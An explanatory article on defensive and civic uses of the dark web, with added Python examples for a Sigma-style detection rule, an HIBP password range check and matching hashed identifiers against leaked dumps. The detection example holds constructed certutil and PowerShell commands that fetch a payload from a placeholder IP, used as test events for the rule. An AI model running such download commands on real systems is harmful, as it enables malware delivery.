The term “dark web” may paint a picture in our heads of threat actors lurking underground, in the shrouded parts of the internet where illicit activity and cybercrime thrive. What has come to be known as the dark web, however, has multifaceted use cases. It is also frequented by gray hats, cyber defenders, data breach monitoring services and researchers.
This hidden network of websites and users is reached through overlay networks such as Tor rather than the open web, and it is not indexed by traditional search engines. The greater degree of anonymity that offers benefits not only threat actors but also political dissidents and others who need to conceal their identity and whereabouts.
Here are some of the ways that ethical hackers, defenders, and real-world protagonists use the dark web.
Gathering threat intelligence
Any cybersecurity researcher or open-source intelligence (OSINT) analyst knows the value of monitoring dark web feeds for threat intelligence.
Frequenting hacker forums or certain .onion sites, accessible only via Tor, may provide insight into threat actors and their evolving tactics, techniques, and procedures (TTPs), as well as the groups they belong to. The latter is especially vital, as some cybercriminals in the underground may work with multiple ransomware or data extortion groups. For example, a threat actor group may operate solely as an initial access broker (IAB), selling access to breached corporate networks or assets to individual ransomware or data extortion groups while being affiliated with any, or none, of those buyers.
Another key aspect of threat intel gathering is looking for upcoming attacks, vulnerability exploits, zero days, phishing toolkits, and newer malware strains circulating from time to time. For example, in the past, the creators of the notorious Raccoon Stealer info-stealing malware announced releases of stealthier variants on hacker forums. At first glance such posts may appear to be aimed at, and valuable only to, threat actors and script kiddies (skids), but they also give antivirus companies early warning: once a sample of the new variant is obtained, signature-based detections can be built into their products quickly, safeguarding home and corporate users.
SOC analysts and researchers can also dissect newer strains and write YARA rules (which match byte and string patterns in files and memory) and Sigma rules (which match patterns in log events) to protect organisational networks from novel threats. Researchers in both academia and industry can gain insight into how network flows can be monitored for up-and-coming stealthy exploits and malware that are harder to detect via conventional means. Keeping tabs on the ever-evolving underground cybercrime scene helps security vendors enrich their defensive technologies and product offerings.
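The following is an added example, not code from the article or from the Sigma project: a minimal evaluator for a Sigma-shaped rule, run over a handful of constructed Windows process-creation events. The rule (certutil.exe being used to fetch a remote file), its filter exception, the events and the 198.51.100.7 address are all constructed for illustration. In practice Sigma rules are converted to a SIEM's query language with tooling such as sigma-cli rather than evaluated like this, but the matching semantics shown here (case-insensitive field matching, list values as OR, selection fields as AND, `selection and not filter`) are the core of what such a rule expresses.

```python
"""Minimal Sigma-style rule evaluation over constructed process-creation events.

Added example: not code from the article or from the Sigma project. Supports a
subset of Sigma semantics: case-insensitive field matching, the |contains,
|startswith and |endswith modifiers, lists as OR, selection fields as AND,
and conditions of the form "selection and not filter".
"""

# Constructed rule in Sigma's shape: flag certutil.exe fetching a remote file
# (a well-known living-off-the-land download technique), with a hypothetical
# exception for an in-house deployment tool.
RULE = {
    "title": "Certutil remote file download",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains": ["urlcache", "verifyctl"],
        },
        "filter": {
            "ParentImage|endswith": "\\patch-deploy.exe",  # hypothetical allowlisted parent
        },
        "condition": "selection and not filter",
    },
}

# Constructed events; 198.51.100.7 is a documentation-range address.
EVENTS = [
    {"category": "process_creation", "product": "windows",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/p.bin C:\\Users\\Public\\p.bin",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"category": "process_creation", "product": "windows",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -encode report.pdf report.b64",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"category": "process_creation", "product": "windows",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -URLCache -f https://updates.example.internal/patch.msi patch.msi",
     "ParentImage": "C:\\Program Files\\Deploy\\patch-deploy.exe"},
    {"category": "process_creation", "product": "windows",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest http://198.51.100.7/p.bin",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
]


def _match_value(actual, expected, modifier):
    """Compare one event value against one rule value, case-insensitively."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if modifier is None:
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")


def _match_field(event, key, expected):
    """A rule key is "Field" or "Field|modifier"; a list of values is an OR."""
    field, _, modifier = key.partition("|")
    values = expected if isinstance(expected, list) else [expected]
    return any(_match_value(event.get(field), v, modifier or None) for v in values)


def _match_selection(event, selection):
    """All fields of a selection must match (AND)."""
    return all(_match_field(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """Return True when the event satisfies the rule's condition."""
    # Only evaluate events that come from the rule's log source.
    if any(event.get(k) != v for k, v in rule["logsource"].items()):
        return False
    detection = rule["detection"]
    results = {name: _match_selection(event, sel)
               for name, sel in detection.items() if name != "condition"}
    verdict = True
    for term in detection["condition"].split(" and "):
        negate = term.startswith("not ")
        hit = results[term[4:] if negate else term]
        verdict = verdict and (not hit if negate else hit)
    return verdict


def matching_events(rule, events):
    """Indexes of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if evaluate(rule, ev)]


if __name__ == "__main__":
    print(RULE["title"], "fires on events:", matching_events(RULE, EVENTS))  # [0]
```

Only the first event fires: the second uses certutil for a benign encode, the third matches the selection but is suppressed by the filter because of its parent process, and the fourth is a different binary altogether. The filter is where false positives are usually tuned away in production, and it is also where an attacker who knows the rule will try to hide, so exceptions should be as narrow as the environment allows.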
Attributing attacks to threat actors
When organizations suffer from data breaches and cyber incidents, the dark web becomes a crucial tool for defenders, including the impacted businesses, their legal teams, and negotiators.
Ransomware groups typically encrypt an organisation's data and steal a copy of it, then demand payment both for a decryption key and for not publishing what they took (so-called double extortion). To gain leverage during negotiations, or should the organisation outright refuse to pay, they often start leaking stolen data on their .onion leak sites in small batches, gradually exposing sensitive customer and employee information (copies of passports, identification documents, protected health data and financial records) to the public. Other threat actors put larger, multi-gigabyte data dumps up for sale on hacker forums, from which identity thieves and phishing actors can benefit.
For the impacted organisation, the dark web becomes a vital means of monitoring the extent of the damage: what information has been publicly exposed, on which forums or online groups, who (if anyone) has claimed responsibility for the attack, and how the stolen assets are being disseminated (sold for profit or leaked for free). Often, .onion sites and Telegram groups are the sole link between an impacted organisation's defenders and the threat actor(s), serving as the primary communication channel, as evidenced by the leaked negotiation chats between Royal Mail and the LockBit ransomware group during the 2023 cyber attack. Defenders doing this monitoring should do it from isolated, disposable infrastructure rather than from the corporate network, since leak sites and forums are hostile ground and the material they serve may itself be malicious.
Attribution becomes especially important when an obvious motive, like monetary gain or ransom, is missing. Hacktivist groups, for example, may target a website or government systems with large-scale Distributed Denial of Service (DDoS) attacks, knocking them offline, and some vigilante software authors may intentionally sabotage their own projects so that they damage systems located in certain parts of the world, all to draw attention to a wider message rather than for financial gain. Without a ransom note or extortion demand, working out who was responsible and why depends on this kind of contextual evidence from the forums and channels the actors use.
Monitoring for data leaks and breaches
Data breach monitoring services like Have I Been Pwned (HIBP) track leaked data dumps surfacing on the dark web and in hacker forums. Users can check whether their information appeared in a known breach simply by entering their email address on HIBP, at no cost. HIBP's Pwned Passwords service also lets a password be checked against leaked credential sets without the password itself being sent: the client transmits only the first five characters of the password's SHA-1 hash and does the comparison locally.
Search engines such as Intelligence X specialise in letting researchers and defenders look up specific selectors, such as a cryptocurrency wallet address, an IP address, a domain or an email address, across public data leaks and the darknet.
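As an added example (not code from the article or from HIBP), the following Python snippet implements the client side of HIBP's Pwned Passwords range API, which uses k-anonymity: only the first five hex characters of the SHA-1 digest leave the machine, and the comparison against the returned suffixes happens locally. The network call is isolated in fetch_range() so that the parsing and matching can be exercised offline against a constructed response; the suffixes and breach counts in that response are made up.

```python
"""Client side of Have I Been Pwned's Pwned Passwords range API (k-anonymity).

Added example, not code from the article or from HIBP. Only the first five hex
characters of the password's SHA-1 digest are sent to the API; the remaining
35 are compared locally against the returned "SUFFIX:COUNT" lines, so neither
the password nor its full hash leaves the machine.
"""
import hashlib
import urllib.request

RANGE_API = "https://api.pwnedpasswords.com/range/"


def split_hash(password):
    """Return (5-char prefix, 35-char suffix) of the upper-case SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix):
    """Live lookup: the server learns only the prefix, never the suffix."""
    req = urllib.request.Request(RANGE_API + prefix,
                                 headers={"User-Agent": "range-check-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def parse_range(body):
    """Parse "SUFFIX:COUNT" lines into {suffix: count}."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password, range_lookup=fetch_range):
    """Number of times the password appeared in known breaches (0 = not found)."""
    prefix, suffix = split_hash(password)
    return parse_range(range_lookup(prefix)).get(suffix, 0)


# Constructed range response for prefix 5BAA6 (SHA-1("password") starts with
# it); the suffixes and counts are made up, not a real API reply.
SAMPLE_RANGE_RESPONSE = """\
0018A45C4D1DEF81644B54AB7F969B88D65:1
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
3BB31C6A0D7E1B0A5C6F3D2E1F0A9B8C7D6:4
"""


def offline_lookup(prefix):
    """Stand-in for fetch_range() so the example runs without network access."""
    return SAMPLE_RANGE_RESPONSE


if __name__ == "__main__":
    for pw in ("password", "a-long-unique-passphrase-for-this-demo"):
        print(pw, "->", breach_count(pw, range_lookup=offline_lookup))
```

A real range response contains several hundred suffixes, which is what makes the prefix a weak identifier: the server cannot tell which of them the client was interested in. HIBP also honours an `Add-Padding: true` request header that pads responses with dummy suffixes of count zero so that response size does not leak the prefix either; a client that sends it should simply skip zero-count lines.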
In a consumer context, dark web monitoring has recently gained prominence in the form of fraud and identity theft monitoring plans offered by leading credit reporting bureaus like TransUnion, Equifax, and Experian.
Users first create a profile with a credit bureau, verifying their identity by answering online questions whose answers the bureau already knows from the historical lending data it holds about consumers (knowledge-based authentication; note that such answers can themselves circulate in breach data, so this step is weaker than it looks). After enrolling in a paid subscription, users can record sensitive information, such as credit card numbers, driving licence details, passport and travel document data, and taxpayer or national identification numbers such as the UK National Insurance Number (NINo), the US Social Security Number (SSN) and the Canadian Social Insurance Number (SIN), on the bureau's website. This information, stored securely, is periodically checked against leaked data emerging on the dark web, such as breached company databases surfacing in the wild.
The idea is that whenever a piece of the recorded data matches an illicit data dump circulating on the dark web, the enrolled user is notified and can act (for example, by placing a fraud alert or a credit freeze) before the exposure turns into identity theft. A match confirms that the data has leaked, but not when, from where, or whether it has already been used.
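An added example (not code from the article or from any credit bureau) of how the matching step can work without the service holding the enrolled identifiers in plaintext: each value is normalised and stored only as an HMAC-SHA256 token under a server-side key, candidate identifiers are extracted from dump text with regular expressions, tokenised the same way and compared. The key, the enrolled values, the regular expressions and the dump are all constructed for illustration; a real service would keep the key in a KMS or HSM and would mostly parse structured dumps rather than free text.

```python
"""Matching enrolled identifiers against a leaked dump without plaintext storage.

Added example, not code from the article or from any credit bureau. Enrolled
values are normalised and kept only as HMAC-SHA256 tokens under a server-side
key; candidate identifiers found in dump text are normalised and tokenised the
same way, so a match never requires the plaintext. Key, enrolments and dump
are constructed for illustration.
"""
import hashlib
import hmac
import re

SERVER_KEY = b"constructed-demo-key-keep-the-real-one-in-a-kms"

# Candidate extractors; constructed patterns, deliberately loose so that the
# token comparison (and, for cards, the Luhn check) does the precise work.
PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-?\d{2}-?\d{4}\b"),                             # US SSN
    "nino": re.compile(r"\b[A-Z]{2}\s?\d{2}\s?\d{2}\s?\d{2}\s?[A-D]\b", re.I),  # UK NINo
    "card": re.compile(r"\b(?:\d[ -]?){13,19}\b"),                             # payment card PAN
}


def normalise(kind, value):
    """Canonical form: whitespace removed and upper-cased (NINo), digits only (others)."""
    if kind == "nino":
        return re.sub(r"\s", "", value).upper()
    return re.sub(r"\D", "", value)


def token(kind, value):
    """Keyed hash of the canonical value; the kind is bound in to stop cross-type matches."""
    msg = f"{kind}:{normalise(kind, value)}".encode("utf-8")
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def luhn_ok(digits):
    """Luhn checksum, used to discard numeric runs that cannot be card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def enrol(records):
    """records: iterable of (kind, value). Only tokens are stored, mapped to their kind."""
    return {token(kind, value): kind for kind, value in records}


def scan_dump(enrolled, dump_text):
    """Return (kind, last four chars) for every enrolled identifier found in the dump."""
    hits = []
    for kind, pattern in PATTERNS.items():
        for match in pattern.finditer(dump_text):
            candidate = match.group(0)
            canonical = normalise(kind, candidate)
            if kind == "card" and not luhn_ok(canonical):
                continue  # a date, an order number, a phone number, etc.
            if token(kind, candidate) in enrolled:
                hits.append((kind, canonical[-4:]))
    return hits


ENROLLED = enrol([
    ("ssn", "123-45-6789"),          # constructed
    ("nino", "QQ123456C"),           # constructed; QQ prefixes are never issued
    ("card", "4111111111111111"),    # well-known test PAN
])

# Constructed extract of a leaked customer table, not real data.
DUMP = """\
id,name,ssn,nino,card,notes
1,A. Example,123-45-6789,QQ 12 34 56 C,4111 1111 1111 1111,enrolled user
2,B. Other,987-65-4321,,1234 5678 9012 3456,not enrolled; card fails Luhn
"""

if __name__ == "__main__":
    for kind, tail in scan_dump(ENROLLED, DUMP):
        print(f"ALERT: enrolled {kind} ending in {tail} found in dump")
```

The normalisation step is what makes "123-45-6789" in the dump match "123456789" at enrolment, and the keyed hash is what keeps a compromise of the token store from becoming a second leak: identifiers like SSNs have so little entropy that an unkeyed SHA-256 table would be brute-forced in minutes, so the protection rests entirely on the key staying out of reach.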
Bypassing censorship and whistleblowing
The dark web and technologies like Tor, Telegram or VPNs may also be relied on by whistleblowers in jurisdictions where internet use is restricted or heavily scrutinised. These tools offer very different guarantees: Tor hides a user's location from the sites they visit, a VPN merely shifts that trust to the VPN provider, and Telegram's ordinary chats are not end-to-end encrypted (only its Secret Chats are), so each should be chosen with the specific adversary in mind.
Political dissidents and defenders of civil liberties who want to raise their voice without compromising their identity or location may opt to use the dark web to disseminate their message or disclose evidence of corporate or governmental wrongdoing, for example. While these actions may be of questionable legality and ethics, they demonstrate the complex nuances of these technologies and the wider “dark web,” which isn’t inherently “bad.”
Technologies like VPNs can allow users to access restricted apps and websites, such as LGBTQ+ social networks, in countries where they are censored. News outlets such as The Guardian often publish an .onion version of their site with identical content. Should the main website be blocked by an authoritarian regime, readers can still reach the outlet over Tor with a greater degree of anonymity, and because an .onion address is derived from the service's own key, it also protects them from impostor mirrors in a way a blocked domain name cannot.
Enforcing the law
If criminals can lurk on the dark web, so can and do the police.
Government law enforcement agencies like the FBI, Interpol and the Australian Federal Police are frequently credited with taking down widespread cybercrime operations. Recently, these have included the FBI and several other law enforcement agencies from different countries cracking down on “AVCheck,” a counter-antivirus (CAV) service used to test malware against detection, and dismantling the Lumma Stealer malware-as-a-service (MaaS) operation, which had stolen millions of passwords.
Beyond seizing illicit domains and dismantling ransomware operations, federal agencies have worked on the dark web to target drug traffickers and those behind child sexual abuse material (CSAM). A recent example is Operation RapTor, in which law enforcement agencies across the US, Europe, South America and Asia collaborated to arrest 270 dark web vendors, buyers and administrators associated with the illegal fentanyl and opioid trade.
Research and journalism
Less obvious but important use cases of the dark web include the value it provides to investigative journalists.
To reporters, the dark web offers an avenue for corroboration between parties and for observing developments “behind the scenes,” particularly during high-profile cyber attacks. Its anonymised communication channels and leak sites may serve as a conduit between reporters and the threat actors who claim to be behind data breaches. While it would be naive to take a threat actor's word at face value, the information or evidence they share about an attack can help a journalist assess how credible the claims of both the threat actor and the impacted organisation are. This can be particularly crucial for independent reporting in cases involving corporate wrongdoing, such as when an organisation wilfully tries to cover up or downplay a security breach to shareholders and customers despite ample evidence, on the balance of probabilities, to the contrary. Other times, a company may not disclose a cyber incident at all. Still, the chatter on dark web forums and ransomware leak sites can enable researchers, the public and journalists to ask the right questions.